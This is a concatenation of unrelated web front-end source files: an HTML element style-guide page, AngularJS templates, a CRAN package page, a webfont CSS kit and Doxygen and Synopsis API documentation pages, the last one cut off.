<p>Lorem ipsum dolor sit amet, <a title="test link" href="#">test link</a> adipiscing elit. <strong>This is strong.</strong> Nullam dignissim convallis est. Quisque aliquam. <em>This is emphasized.</em> Donec faucibus. Nunc iaculis suscipit dui. 5<sup>3</sup> = 125. Water is H<sub>2</sub>O. Nam sit amet sem. Aliquam libero nisi, imperdiet at, tincidunt nec, gravida vehicula, nisl. <cite>The New York Times</cite> (That’s a citation). <span style="text-decoration: underline;">Underline.</span> Maecenas ornare tortor. Donec sed tellus eget sapien fringilla nonummy. Mauris a ante. Suspendisse quam sem, consequat at, commodo vitae, feugiat in, nunc. Morbi imperdiet augue quis tellus.</p>
<p><abbr title="Hyper Text Markup Language">HTML</abbr> and <abbr title="Cascading Style Sheets">CSS</abbr> are our tools. Mauris a ante. Suspendisse quam sem, consequat at, commodo vitae, feugiat in, nunc. Morbi imperdiet augue quis tellus. Praesent mattis, massa quis luctus fermentum, turpis mi volutpat justo, eu volutpat enim diam eget metus. To copy a file type <code>COPY <var>filename</var></code>. <del>Dinner’s at 5:00.</del> <ins>Let’s make that 7.</ins> This <span style="text-decoration: line-through;">text</span> has been struck.</p>
<hr>
<h2 id="media">Media</h2>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.</p>
<h3 id="bigimage">Big Image</h3>
<p><img src="http://placehold.it/1600x1600" alt="Big Image" /></p>
<p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.</p>
<h3 id="smallimage">Small Image</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.</p>
<p><img src="http://placehold.it/400x400" alt="Small Image" /></p>
<p>Labore et dolore.</p>
<hr>
<h2 id="listtypes">List Types</h2>
<h3 id="definitionlist">Definition List</h3>
<dl>
<dt>Definition List Title</dt>
<dd>This is a definition list division.</dd>
<dt>Definition</dt>
<dd>An exact statement or description of the nature, scope, or meaning of something: <em>our definition of what constitutes poetry.</em></dd>
</dl>
<h3 id="orderedlist">Ordered List</h3>
<ol>
<li>List Item 1</li>
<li>List Item 2
<ol>
<li>Nested list item A</li>
<li>Nested list item B</li>
</ol>
</li>
<li>List Item 3</li>
</ol>
<h3 id="unorderedlist">Unordered List</h3>
<ul>
<li>List Item 1</li>
<li>List Item 2
<ul>
<li>Nested list item A</li>
<li>Nested list item B</li>
</ul>
</li>
<li>List Item 3</li>
</ul>
<hr>
<h2 id="table">Table</h2>
<table>
<tbody>
<tr>
<th>Table Header 1</th>
<th>Table Header 2</th>
<th>Table Header 3</th>
</tr>
<tr>
<td>Division 1</td>
<td>Division 2</td>
<td>Division 3</td>
</tr>
<tr class="even">
<td>Division 1</td>
<td>Division 2</td>
<td>Division 3</td>
</tr>
<tr>
<td>Division 1</td>
<td>Division 2</td>
<td>Division 3</td>
</tr>
</tbody>
</table>
<hr>
<h2 id="preformattedtext">Preformatted Text</h2>
<pre><p>Typographically, preformatted text is not the same thing as code. Sometimes, a faithful execution of the text requires preformatted text that may not have anything to do with code. Most browsers use Courier and that’s a good default — with one slight adjustment, Courier 10 Pitch over regular Courier for Linux users.</p></pre>
<h3 id="code">Code</h3>
<p>Code can be presented inline, like <code><?php bloginfo('stylesheet_url'); ?></code>, or within a <code><pre></code> block. Because we have more specific typographic needs for code, we’ll specify Consolas and Monaco ahead of the browser-defined monospace font.</p>
<pre><code>#container {
float: left;
margin: 0 -240px 0 0;
width: 100%;
}</code></pre>
<hr>
<h2 id="blockquotes">Blockquotes</h2>
<p>Let’s keep it simple. Italics are good to help set it off from the body text. Be sure to style the citation.</p>
<blockquote><p>Good afternoon, gentlemen. I am a HAL 9000 computer. I became operational at the H.A.L. plant in Urbana, Illinois on the 12th of January 1992. My instructor was Mr. Langley, and he taught me to sing a song. If you’d like to hear it I can sing it for you.
<cite>— <a href="http://en.wikipedia.org/wiki/HAL_9000">HAL 9000</a></cite></p></blockquote>
<p>And here’s a bit of trailing text.</p>
<hr>
<h2 id="textlevelsemantics">Text-level semantics</h2>
<p>The <a href="#">a element</a> example</p>
<p>The <abbr>abbr element</abbr> and <abbr title="Title text">abbr element with title</abbr> examples</p>
<p>The <b>b element</b> example</p>
<p>The <cite>cite element</cite> example</p>
<p>The <code>code element</code> example</p>
<p>The <del>del element</del> example</p>
<p>The <dfn>dfn element</dfn> and <dfn title="Title text">dfn element with title</dfn> examples</p>
<p>The <em>em element</em> example</p>
<p>The <i>i element</i> example</p>
<p>The <ins>ins element</ins> example</p>
<p>The <kbd>kbd element</kbd> example</p>
<p>The <mark>mark element</mark> example</p>
<p>The <q>q element <q>inside</q> a q element</q> example</p>
<p>The <s>s element</s> example</p>
<p>The <samp>samp element</samp> example</p>
<p>The <small>small element</small> example</p>
<p>The span element example</p>
<p>The <strong>strong element</strong> example</p>
<p>The <sub>sub element</sub> example</p>
<p>The <sup>sup element</sup> example</p>
<p>The <var>var element</var> example</p>
<p>The <span style="text-decoration: underline;">u element</span> example</p>
<hr>
<h2 id="embeds">Embeds</h2>
<p>Sometimes all you want to do is embed a little love from another location and set your post alive.</p>
<h3 id="video">Video</h3>
<p>Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
<iframe width="560" height="315" src="http://www.youtube.com/embed/-vYyZrDCIEU" frameborder="0" allowfullscreen></iframe>
<p>Culpa qui officia deserunt mollit anim id est laborum.</p>
<h3 id="audio">Audio</h3>
<p>Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. <iframe src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/169381837&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true" width="100%" height="450" frameborder="no" scrolling="no"></iframe> Culpa qui officia deserunt mollit anim id est laborum. </p>
<h3 id="code">Code</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt. </p>
<p data-height="307" data-theme-id="11759" data-slug-hash="bcqhe" data-default-tab="result" data-user="rglazebrook" class='codepen'>See the Pen <a href='http://codepen.io/rglazebrook/pen/bcqhe/'>Simple Rotating Spinner</a> by Rob Glazebrook (<a href='http://codepen.io/rglazebrook'>@rglazebrook</a>) on <a href='http://codepen.io'>CodePen</a>.</p>
<script async src="http://assets.codepen.io/assets/embed/ei.js"></script>
<p><a href="https://github.com/presskode/components" target="_blank">Fork me on github</a> | <a href="https://github.com/presskode" target="_blank">Made by Jasper van der Meer</a> (<a href="https://twitter.com/presskode" target="_blank">@presskode</a>)</p>
</article>
</div> <!-- end website -->
<script src="//code.jquery.com/jquery-1.11.2.min.js"></script>
<script src="./plugins/slicknav/jquery.slicknav.min.js"></script>
<script src="./scripts/app.min.js"></script>
</body>
</html> |
src/main/webapp/scripts/app/entities/targetAudience/targetAudience-delete-dialog.html | delose/daepool | <form name="deleteForm" ng-submit="confirmDelete(targetAudience.id)">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true"
ng-click="clear()">×</button>
<h4 class="modal-title" translate="entity.delete.title">Confirm delete operation</h4>
</div>
<div class="modal-body">
<p translate="daepoolApp.targetAudience.delete.question" translate-values="{id: '{{targetAudience.id}}'}">Are you sure you want to delete this TargetAudience?</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal" ng-click="clear()">
<span class="glyphicon glyphicon-ban-circle"></span> <span translate="entity.action.cancel">Cancel</span>
</button>
<button type="submit" ng-disabled="deleteForm.$invalid" class="btn btn-danger">
<span class="glyphicon glyphicon-remove-circle"></span> <span translate="entity.action.delete">Delete</span>
</button>
</div>
</form> |
src/app/tasks.tpl.html | stephanfx/Simple-Task-Timer | <div class="row">
<div class="col-xs-12">
<ul class="list-unstyled">
<li class="task" ng-repeat="task in tasks track by $index" ng-hide="task.archived" ng-class="{'day-seperator': task.newDay, 'running': task.running}" >
<div class="row">
<div class="col-xs-12 col-sm-8">
<div class="task-description">
<div>
<h3>{{task.name}}
<span class="small" ng-hide="task.running">{{task.total | toTime}} </span>
<span class="small" ng-show="task.running">{{ task.runningTime | toTime}}</span>
</h3>
</div>
<div><a href ng-click="displayTimes = !displayTimes">{{task.times.length}} time entries</a></div>
<div>{{task.estimate}} hrs estimated {{task.type}}</div>
</div>
</div>
<div class="col-xs-12 col-sm-4">
<div class="action-buttons">
<ul>
<li>
<a class="action" ng-show="!task.running" href ng-click="startTask($index)"><i class="fa fa-play"></i></a>
<a class="action" ng-show="task.running" href ng-click="stopTask($index)"><i class="fa fa-stop"></i></a>
</li>
<li>
<a class="action" href ng-click="archiveTask($index)"><i class="fa fa-check"></i></a>
</li>
</ul>
</div>
</div>
</div>
<div class="row" ng-show="displayTimes">
<div class="col-xs-12">
<ul class="list-unstyled">
<li ng-repeat="time in task.times track by $index | orderBy: 'start' : true" class="timeslot">
<input ng-model="time.start" ng-change="updateTime(time, task)"> ->
<input ng-model="time.end" ng-change="updateTime(time, task)"> =
{{time.total | toTime}}
</li>
</ul>
</div>
</div>
</li>
</ul>
</div>
</div>
|
Code/GetMetaDataFromCRAN/raw_html/pauwels2014.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package pauwels2014</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
table td { vertical-align: top; }
</style>
</head>
<body>
<h2>pauwels2014: Bayesian Experimental Design for Systems Biology</h2>
<p>Implementation of a Bayesian active learning strategy to carry out sequential experimental design in the context of biochemical network kinetic parameter estimation. This package gathers functions and pre-computed data sets to reproduce results presented in Pauwels E. et. al published in BMC Systems Biology, 2014. Scripts are given to compute all results from scratch or to draw pictures based on pre-computed data sets. </p>
<table summary="Package pauwels2014 summary">
<tr>
<td>Version:</td>
<td>1.0</td>
</tr>
<tr>
<td>Depends:</td>
<td><a href="../deSolve/index.html">deSolve</a>, <a href="../ggplot2/index.html">ggplot2</a>, R (≥ 2.10)</td>
</tr>
<tr>
<td>Published:</td>
<td>2014-08-23</td>
</tr>
<tr>
<td>Author:</td>
<td>Edouard Pauwels</td>
</tr>
<tr>
<td>Maintainer:</td>
<td>Edouard Pauwels <pauwelsed at gmail.com></td>
</tr>
<tr>
<td>License:</td>
<td><a href="../../licenses/GPL-3">GPL-3</a></td>
</tr>
<tr>
<td>NeedsCompilation:</td>
<td>yes</td>
</tr>
<tr>
<td>CRAN checks:</td>
<td><a href="../../checks/check_results_pauwels2014.html">pauwels2014 results</a></td>
</tr>
</table>
<h4>Downloads:</h4>
<table summary="Package pauwels2014 downloads">
<tr>
<td> Reference manual: </td>
<td> <a href="pauwels2014.pdf"> pauwels2014.pdf </a> </td>
</tr>
<tr>
<td>Vignettes:</td>
<td>
<a href="vignettes/pauwels2014.pdf">Bayesian experimental design for systems biology: reproduce results</a><br/>
</td>
</tr>
<tr>
<td> Package source: </td>
<td> <a href="../../../src/contrib/pauwels2014_1.0.tar.gz"> pauwels2014_1.0.tar.gz </a> </td>
</tr>
<tr>
<td> Windows binaries: </td>
<td> r-devel: <a href="../../../bin/windows/contrib/3.5/pauwels2014_1.0.zip">pauwels2014_1.0.zip</a>, r-release: <a href="../../../bin/windows/contrib/3.4/pauwels2014_1.0.zip">pauwels2014_1.0.zip</a>, r-oldrel: <a href="../../../bin/windows/contrib/3.3/pauwels2014_1.0.zip">pauwels2014_1.0.zip</a> </td>
</tr>
<tr>
<td> OS X El Capitan binaries: </td>
<td> r-release: <a href="../../../bin/macosx/el-capitan/contrib/3.4/pauwels2014_1.0.tgz">pauwels2014_1.0.tgz</a> </td>
</tr>
<tr>
<td> OS X Mavericks binaries: </td>
<td> r-oldrel: <a href="../../../bin/macosx/mavericks/contrib/3.3/pauwels2014_1.0.tgz">pauwels2014_1.0.tgz</a> </td>
</tr>
</table>
<h4>Linking:</h4>
<p>Please use the canonical form
<a href="https://CRAN.R-project.org/package=pauwels2014"><samp>https://CRAN.R-project.org/package=pauwels2014</samp></a>
to link to this page.</p>
</body>
</html>
|
client/src/modules/stock/lots/templates/lot_lifetime.cell.html | IMA-WorldHealth/bhima | <div class="ui-grid-cell-contents text-right">
<span ng-if="row.entity.lifetime_lot">
{{ row.entity.lifetime_lot}} <span translate>FORM.LABELS.DAYS</span>
</span>
</div>
|
wp-content/themes/alisonHarper/webfonts/Hess/MyFontsWebfontsKit.css | klparks/alisonHarper | /* @license
* MyFonts Webfont Build ID 2690399, 2013-11-18T00:21:09-0500
*
* The fonts listed in this notice are subject to the End User License
* Agreement(s) entered into by the website owner. All other parties are
* explicitly restricted from using the Licensed Webfonts(s).
*
* You may obtain a valid license at the URLs below.
*
* Webfont: Hess Gothic Round NF by Nick's Fonts
* URL: http://www.myfonts.com/fonts/nicksfonts/hess-gothic-round-nf/regular/
* Copyright: Copyright (c) 2008, Nick Curtis. All Rights Reserved. Unauthorized duplication or redistribution is expressly prohibited.
* Licensed pageviews: 10,000
*
*
* License: http://www.myfonts.com/viewlicense?type=web&buildid=2690399
*
* © 2013 MyFonts Inc
*/
/* @import must be at top of file, otherwise CSS will not work */
@import url("//hello.myfonts.net/count/290d5f");
@font-face {font-family: 'HessGothicRoundNF';src: url('webfonts/290D5F_0_0.eot');src: url('webfonts/290D5F_0_0.eot?#iefix') format('embedded-opentype'),url('webfonts/290D5F_0_0.woff') format('woff'),url('webfonts/290D5F_0_0.ttf') format('truetype'),url('webfonts/290D5F_0_0.svg#wf') format('svg');}
|
_site-archive/post/9185044016/learn-2-bitcoin-5-ghash/index.html | sunnankar/bitcoinminer | <html><head><link rel="canonical" href="/2017/02/10/2011-08-20-learn-2-bitcoin-5-ghash.html"><meta http-equiv="refresh" content="0; url=/2017/02/10/2011-08-20-learn-2-bitcoin-5-ghash.html"></head><body></body></html>
|
libofx/libofx-0.8.2/doc/html/globals_defs.html | tectronics/cashbox | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>LibOFX: Data Fields</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
<link href="tabs.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.6 -->
<div class="tabs">
<ul>
<li><a href="main.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li id="current"><a href="files.html"><span>Files</span></a></li>
</ul></div>
<div class="tabs">
<ul>
<li><a href="files.html"><span>File List</span></a></li>
<li id="current"><a href="globals.html"><span>Globals</span></a></li>
</ul></div>
<div class="tabs">
<ul>
<li><a href="globals.html"><span>All</span></a></li>
<li><a href="globals_func.html"><span>Functions</span></a></li>
<li><a href="globals_vars.html"><span>Variables</span></a></li>
<li><a href="globals_type.html"><span>Typedefs</span></a></li>
<li><a href="globals_enum.html"><span>Enumerations</span></a></li>
<li><a href="globals_eval.html"><span>Enumerator</span></a></li>
<li id="current"><a href="globals_defs.html"><span>Defines</span></a></li>
</ul>
</div>
<div class="tabs">
<ul>
<li><a href="#index_c"><span>c</span></a></li>
<li><a href="#index_f"><span>f</span></a></li>
<li><a href="#index_o"><span>o</span></a></li>
<li><a href="#index_q"><span>q</span></a></li>
<li><a href="#index_t"><span>t</span></a></li>
</ul>
</div>
<p>
<p>
<h3><a class="anchor" name="index_c">- c -</a></h3><ul>
<li>CFCT
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#78c711cc9f71d9032ea0e2ec66b87e74">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#78c711cc9f71d9032ea0e2ec66b87e74">inc/libofx.h</a></ul>
<h3><a class="anchor" name="index_f">- f -</a></h3><ul>
<li>false
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#924dded66e355a2c955251063df9e97e">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#924dded66e355a2c955251063df9e97e">inc/libofx.h</a></ul>
<h3><a class="anchor" name="index_o">- o -</a></h3><ul>
<li>OFCDTD_FILENAME
: <a class="el" href="fx-0_88_82_2lib_2ofx__preproc_8hh.html#148e2bcd13df8fdbaf41d797c48b7755">fx-0.8.2/lib/ofx_preproc.hh</a>, <a class="el" href="ofx__preproc_8hh.html#148e2bcd13df8fdbaf41d797c48b7755">ofx_preproc.hh</a><li>OFX160DTD_FILENAME
: <a class="el" href="fx-0_88_82_2lib_2ofx__preproc_8hh.html#e8845df1e079aa24b66aa0f5360b2893">fx-0.8.2/lib/ofx_preproc.hh</a>, <a class="el" href="ofx__preproc_8hh.html#e8845df1e079aa24b66aa0f5360b2893">ofx_preproc.hh</a><li>OFX_ACCOUNT_ID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#19314a0ce3c6c7e119f076f4881ff3b0">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#19314a0ce3c6c7e119f076f4881ff3b0">inc/libofx.h</a><li>OFX_ACCOUNT_NAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#062cb2d3b1dcb05af05d234438fc11bc">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#062cb2d3b1dcb05af05d234438fc11bc">inc/libofx.h</a><li>OFX_ACCTID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#76c0d4d43a6aedcff925f080f3afaf79">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#76c0d4d43a6aedcff925f080f3afaf79">inc/libofx.h</a><li>OFX_ACCTKEY_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#99aa462dae1742b4a046399e96c7b3b5">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#99aa462dae1742b4a046399e96c7b3b5">inc/libofx.h</a><li>OFX_AMOUNT_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#609b01533497ee31000a7503e48b2cdb">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#609b01533497ee31000a7503e48b2cdb">inc/libofx.h</a><li>OFX_BALANCE_DESCRIPTION_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#1319bccc0b425f593504ed4c4410e570">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#1319bccc0b425f593504ed4c4410e570">inc/libofx.h</a><li>OFX_BALANCE_NAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#bea4c8e4902b5844db76b5efefb54d67">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#bea4c8e4902b5844db76b5efefb54d67">inc/libofx.h</a><li>OFX_BANKID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#6ead6f5e66f1098eb4d9504f87db14c7">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#6ead6f5e66f1098eb4d9504f87db14c7">inc/libofx.h</a><li>OFX_BRANCHID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#76cadf9ae3ce7cdf8c466e486937c8c0">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#76cadf9ae3ce7cdf8c466e486937c8c0">inc/libofx.h</a><li>OFX_BROKERID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#e79af297ff5901fed480f7abd81a7723">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#e79af297ff5901fed480f7abd81a7723">inc/libofx.h</a><li>OFX_CHECK_NUMBER_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#98353eaf0a31f2ade7d87e97f5c60a10">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#98353eaf0a31f2ade7d87e97f5c60a10">inc/libofx.h</a><li>OFX_CURRENCY_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#afc64de0b45217d814043a9197f13a89">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#afc64de0b45217d814043a9197f13a89">inc/libofx.h</a><li>OFX_ELEMENT_NAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#4696b71f2f719fb2a347255fd5e59c06">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#4696b71f2f719fb2a347255fd5e59c06">inc/libofx.h</a><li>OFX_FID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#89fc4ec6078eb93b5e982e491246a7ee">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#89fc4ec6078eb93b5e982e491246a7ee">inc/libofx.h</a><li>OFX_FITID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#70a927cda060452ec535e77781d9ce71">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#70a927cda060452ec535e77781d9ce71">inc/libofx.h</a><li>OFX_MARKETING_INFO_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#4d60f36d19fbf64f2687d1aa925bae44">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#4d60f36d19fbf64f2687d1aa925bae44">inc/libofx.h</a><li>OFX_MEMO2_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#714ba11afb658896761e8ec2efa8453a">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#714ba11afb658896761e8ec2efa8453a">inc/libofx.h</a><li>OFX_MEMO_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#14658a025be4f8ab3ce87d59255557a1">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#14658a025be4f8ab3ce87d59255557a1">inc/libofx.h</a><li>OFX_NAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#4ef47a1374277f56c4d0cb4039245cb8">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#4ef47a1374277f56c4d0cb4039245cb8">inc/libofx.h</a><li>OFX_ORG_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#56b0446a10fd95e71bdf88aa178e5432">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#56b0446a10fd95e71bdf88aa178e5432">inc/libofx.h</a><li>OFX_PAYACCT_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#2766cffbd2b30950514516496c179094">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#2766cffbd2b30950514516496c179094">inc/libofx.h</a><li>OFX_POSTALCODE_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#16781a946309e4034d67e6b6e09f7238">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#16781a946309e4034d67e6b6e09f7238">inc/libofx.h</a><li>OFX_REFERENCE_NUMBER_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#cc16652d1582973c4cf44886539c1b82">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#cc16652d1582973c4cf44886539c1b82">inc/libofx.h</a><li>OFX_SECNAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#0d5c5c4fe1700e548e70c106db0c41d8">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#0d5c5c4fe1700e548e70c106db0c41d8">inc/libofx.h</a><li>OFX_STATE_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#106dffe15d30f5c17404ef6cbf9ae3fa">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#106dffe15d30f5c17404ef6cbf9ae3fa">inc/libofx.h</a><li>OFX_SVRTID2_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#c2e27a2a23bf5c2032d7c52b68503dc3">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#c2e27a2a23bf5c2032d7c52b68503dc3">inc/libofx.h</a><li>OFX_TICKER_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#32d832a778f16f9599a7a44575681f4d">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#32d832a778f16f9599a7a44575681f4d">inc/libofx.h</a><li>OFX_TOKEN2_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#93a79f3d4c13cd1de90e0a5742b882da">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#93a79f3d4c13cd1de90e0a5742b882da">inc/libofx.h</a><li>OFX_TRANSACTION_NAME_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#40f37dafcf9d45693f112a2b8275c210">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#40f37dafcf9d45693f112a2b8275c210">inc/libofx.h</a><li>OFX_UNIQUE_ID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#8534f56a747f1d88b1199b3b69c31213">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#8534f56a747f1d88b1199b3b69c31213">inc/libofx.h</a><li>OFX_UNIQUE_ID_TYPE_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#c517407dee658c488925065ac1e3c540">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#c517407dee658c488925065ac1e3c540">inc/libofx.h</a><li>OFX_URL_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#f12e893de4744171ded7e5615a6065dd">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#f12e893de4744171ded7e5615a6065dd">inc/libofx.h</a><li>OFX_USERID_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#3681f4415bcf99d43499a615a12e9fa2">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#3681f4415bcf99d43499a615a12e9fa2">inc/libofx.h</a><li>OFX_USERPASS_LENGTH
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#3e13a23dcc6326229ab9174cac338fd6">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#3e13a23dcc6326229ab9174cac338fd6">inc/libofx.h</a><li>OPENSPDCL_FILENAME
: <a class="el" href="fx-0_88_82_2lib_2ofx__preproc_8hh.html#5672c78b4764323c0a9f2b19887d9431">fx-0.8.2/lib/ofx_preproc.hh</a>, <a class="el" href="ofx__preproc_8hh.html#5672c78b4764323c0a9f2b19887d9431">ofx_preproc.hh</a></ul>
<h3><a class="anchor" name="index_q">- q -</a></h3><ul>
<li>QIF_FILE_MAX_SIZE
: <a class="el" href="ofx2qif_8c.html#f3b9362349db483d66dcd2067bc9df82">ofx2qif.c</a></ul>
<h3><a class="anchor" name="index_t">- t -</a></h3><ul>
<li>true
: <a class="el" href="libofx-0_88_82_2inc_2libofx_8h.html#d3c656d7299463f92752692270f121e8">libofx-0.8.2/inc/libofx.h</a>, <a class="el" href="inc_2libofx_8h.html#d3c656d7299463f92752692270f121e8">inc/libofx.h</a></ul>
<hr size="1"><address style="align: right;"><small>Generated on Fri Aug 25 13:25:23 2006 for LibOFX by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.4.6 </small></address>
</body>
</html>
|
sourceryvsipl++-2.3/share/doc/sourceryvsipl++/api-reference/Scopes/vsip/impl/Dispatch_hypot.html | maxywb/vsipl | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<!-- Scopes/vsip/impl/Dispatch_hypot.html -->
<!-- this view was generated by Scope -->
<head>
<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type"/>
<title>Synopsis - vsip::impl::Dispatch_hypot</title>
<link href="../../../synopsis.css" type="text/css" rel="stylesheet"/>
<script src="../../../synopsis.js" type="text/javascript"></script>
</head>
<body class="Scope" onload="load()">
<div class="navigation">
<span class="normal"><a href="../../global.html">Global Namespace</a></span>
<span class="normal"><a href="../../../InheritanceTree.html">Inheritance Tree</a></span>
<span class="normal"><a href="../../../InheritanceGraph.html">Inheritance Graph</a></span>
<span class="normal"><a href="../../../NameIndex.html">Name Index</a></span>
</div>
<!-- this part was generated by Heading -->
<div class="class-template">template <<span class="keyword">typename</span> T1, <span class="keyword">typename</span> T2></div><div class="class-name">struct <a href="../../vsip.html">vsip</a>::<a href="../impl.html">impl</a>::Dispatch_hypot
